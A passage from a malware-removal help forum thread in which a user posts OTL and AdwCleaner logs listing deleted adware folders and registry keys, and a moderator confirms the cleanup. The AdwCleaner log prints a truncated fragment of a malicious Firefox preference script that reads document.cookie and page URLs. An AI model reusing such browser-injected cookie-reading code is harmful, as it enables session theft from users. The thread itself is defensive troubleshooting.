"" = %SystemRoot%\system32\shell32.dll -- [2014/03/24 20:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 19:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 21:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 19:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2013/01/20 18:39:30 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\.minecraft
[2014/04/06 19:28:56 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Audacity
[2013/04/06 22:36:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\cYo
[2013/07/08 11:41:42 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\DAEMON Tools Lite
[2013/03/20 10:19:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\DVDVideoSoft
[2012/08/19 17:44:35 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\EPSON
[2012/04/17 16:50:40 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\LolClient
[2012/05/23 16:34:03 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\LolClient2
[2011/09/24 08:34:57 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\OpenCandy
[2014/05/23 20:29:40 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Oracle
[2014/03/21 14:54:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\SumatraPDF
[2014/07/13 00:20:54 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\uTorrent
[2012/05/27 13:22:07 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\WildTangent
[2012/12/18 22:46:01 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Windows Live Writer
 
========== Purity Check ==========
 
 

< End of report >


 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 19:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2013/01/20 18:39:30 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\.minecraft
[2014/04/06 19:28:56 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Audacity
[2013/04/06 22:36:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\cYo
[2013/07/08 11:41:42 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\DAEMON Tools Lite
[2013/03/20 10:19:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\DVDVideoSoft
[2012/08/19 17:44:35 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\EPSON
[2012/04/17 16:50:40 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\LolClient
[2012/05/23 16:34:03 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\LolClient2
[2011/09/24 08:34:57 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\OpenCandy
[2014/05/23 20:29:40 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Oracle
[2014/03/21 14:54:20 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\SumatraPDF
[2014/07/13 00:20:54 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\uTorrent
[2012/05/27 13:22:07 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\WildTangent
[2012/12/18 22:46:01 | 000,000,000 | ---D | M] -- C:\Users\VPaez\AppData\Roaming\Windows Live Writer
 
========== Purity Check ==========
 
 

< End of report >
 

-------------------------------------------------------

 

inked


Edited by inked_illusion, 27 July 2014 - 09:04 AM.

  • 0

#6
inked_illusion

inked_illusion

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

Here is the Logfile from AdwCleaner[S0]:

 

# AdwCleaner v3.216 - Report created 27/07/2014 at 09:11:18
# Updated 17/07/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : VPaez - VPAEZ-HP
# Running from : C:\Users\VPaez\Downloads\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****


***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Ask
Folder Deleted : C:\ProgramData\SoftSafe
Folder Deleted : C:\ProgramData\BrOwwsae2saevEe
Folder Deleted : C:\ProgramData\CheappMe
Folder Deleted : C:\ProgramData\DeaLEexxpress
Folder Deleted : C:\ProgramData\EnjoyCoupon
Folder Deleted : C:\Program Files (x86)\Protected Search
Folder Deleted : C:\Program Files (x86)\Red Sky
Folder Deleted : C:\Users\Administrator\AppData\Local\torch
Folder Deleted : C:\Users\Guest\AppData\Local\DownTango
Folder Deleted : C:\Users\Guest\AppData\Local\torch
Folder Deleted : C:\Users\Guest\AppData\LocalLow\AskToolbar
Folder Deleted : C:\Users\Guest\AppData\LocalLow\somoto_v.1
Folder Deleted : C:\Users\Guest\Documents\Updater
Folder Deleted : C:\Users\HomeGroupUser$\AppData\Local\torch
Folder Deleted : C:\Users\LogMeInRemoteUser\AppData\Local\torch
Folder Deleted : C:\Users\VPaez\AppData\Local\Conduit
Folder Deleted : C:\Users\VPaez\AppData\Local\OpenCandy
Folder Deleted : C:\Users\VPaez\AppData\Local\torch
Folder Deleted : C:\Users\VPaez\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\VPaez\AppData\LocalLow\SimplyTech
Folder Deleted : C:\Users\VPaez\AppData\Roaming\OpenCandy
Folder Deleted : C:\Users\VPaez\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TornTV.com
Folder Deleted : C:\Users\VPaez\Documents\Updater
File Deleted : C:\Windows\System32\roboot64.exe
File Deleted : C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\v9.xml
File Deleted : C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\user.js

***** [ Shortcuts ] *****


***** [ Registry ] *****

Value Deleted : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [[email protected]]
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\AdvancedSystemProtector_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\AdvancedSystemProtector_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\HPSF_Tasks_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\HPSF_Tasks_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\systweakasp_rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\systweakasp_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\TaskScheduler_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\TaskScheduler_RASMANCS
Key Deleted : HKLM\SOFTWARE\Classes\CheApMeu.CheApMeu
Key Deleted : HKLM\SOFTWARE\Classes\CheApMeu.CheApMeu.5.1
Key Deleted : HKLM\SOFTWARE\Classes\DealExPiresss.DealExPiresss
Key Deleted : HKLM\SOFTWARE\Classes\DealExPiresss.DealExPiresss.2.1
Key Deleted : HKLM\SOFTWARE\Classes\ExxsstraCoupon.ExxsstraCoupon
Key Deleted : HKLM\SOFTWARE\Classes\ExxsstraCoupon.ExxsstraCoupon.4.3
Key Deleted : HKLM\SOFTWARE\Classes\EnjoyCoouPon.EnjoyCoouPon
Key Deleted : HKLM\SOFTWARE\Classes\EnjoyCoouPon.EnjoyCoouPon.3.4
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-482248051
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{e9f32388}
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3072253
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3282812
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C007DADD-132A-624C-088E-59EE6CF0711F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{61338710-4A04-5ABD-CB1D-24C341B2D72B}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A27DB4ED-E445-4F4F-0D9C-88652337AD08}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D4A5E077-0C79-B14E-B36D-D6E6E4E5D1B5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ECE1388D-4D92-DBF4-11B3-61A093CF76E5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{61338710-4A04-5ABD-CB1D-24C341B2D72B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{A27DB4ED-E445-4F4F-0D9C-88652337AD08}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{D4A5E077-0C79-B14E-B36D-D6E6E4E5D1B5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{ECE1388D-4D92-DBF4-11B3-61A093CF76E5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CFD485F0-96BD-47CD-BB6D-CD7DDA95F102}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2FA28606-DE77-4029-AF96-B231E3B8F827}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B7FCA997-D0FB-4FE0-8AFD-255E89CF9671}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D43B3890-80C7-4010-A95D-1E77B5924DC3}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{61338710-4A04-5ABD-CB1D-24C341B2D72B}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{A27DB4ED-E445-4F4F-0D9C-88652337AD08}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{D4A5E077-0C79-B14E-B36D-D6E6E4E5D1B5}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{ECE1388D-4D92-DBF4-11B3-61A093CF76E5}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2FA28606-DE77-4029-AF96-B231E3B8F827}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B7FCA997-D0FB-4FE0-8AFD-255E89CF9671}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D43B3890-80C7-4010-A95D-1E77B5924DC3}
Key Deleted : HKCU\Software\1ClickDownload
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\AppDataLow\SProtector
Key Deleted : HKCU\Software\AppDataLow\Software\ConduitSearchScopes
Key Deleted : HKCU\Software\AppDataLow\Software\Crossrider
Key Deleted : HKCU\Software\AppDataLow\Software\simplytech
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\Software\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Deleted : HKLM\Software\Conduit
Key Deleted : HKLM\Software\SN.Booster
Key Deleted : HKLM\Software\SP Global
Key Deleted : HKLM\Software\SProtector
Key Deleted : HKLM\Software\SupTab
Key Deleted : HKLM\Software\supWPM
Key Deleted : HKLM\Software\systweak
Key Deleted : HKLM\Software\V9Software
Key Deleted : HKLM\Software\YourFileDownloader
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{79A765E1-C399-405B-85AF-466F52E918B0}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2DF3E224-05CD-4113-AA7A-86F2F6607B46}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7DD5E91C-3864-77EC-7635-D14910C2A03E}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17207

Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Bar]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [(Default)]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchUrl [(Default)]

-\\ Mozilla Firefox v30.0 (en-US)

[ File : C:\Users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\tiqywapp.default-1406355425127\prefs.js ]


[ File : C:\Users\VPaez\AppData\Roaming\Mozilla\Firefox\Profiles\gfr14k0z.default-1402764291221\prefs.js ]

Line Deleted : user_pref("extensions.9FDrVT.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]

*************************

AdwCleaner[R0].txt - [9274 octets] - [27/07/2014 09:10:10]
AdwCleaner[S0].txt - [9015 octets] - [27/07/2014 09:11:18]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [9075 octets] ##########
 

 

-----------------------------------------------------------------

 

If there's anything else left that I can do just tell me.  Thanks

 

inked


  • 0

#7
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts

How is the computer now ?  The main problem was your Firefox prefs folder, but AdwCleaner zapped that for me :)


  • 0

#8
inked_illusion

inked_illusion

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts

I'll give you an update on the weekend, as I am living somewhere else and could not get access right now to the infected computer. 

 

Thanks a whole lot man :)

 

Inked


  • 0

#9
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts

No problem :)


  • 0

#10
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0






Similar Topics


Also tagged with one or more of these keywords: YourFile Downloader, Malware, Virus Infection

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP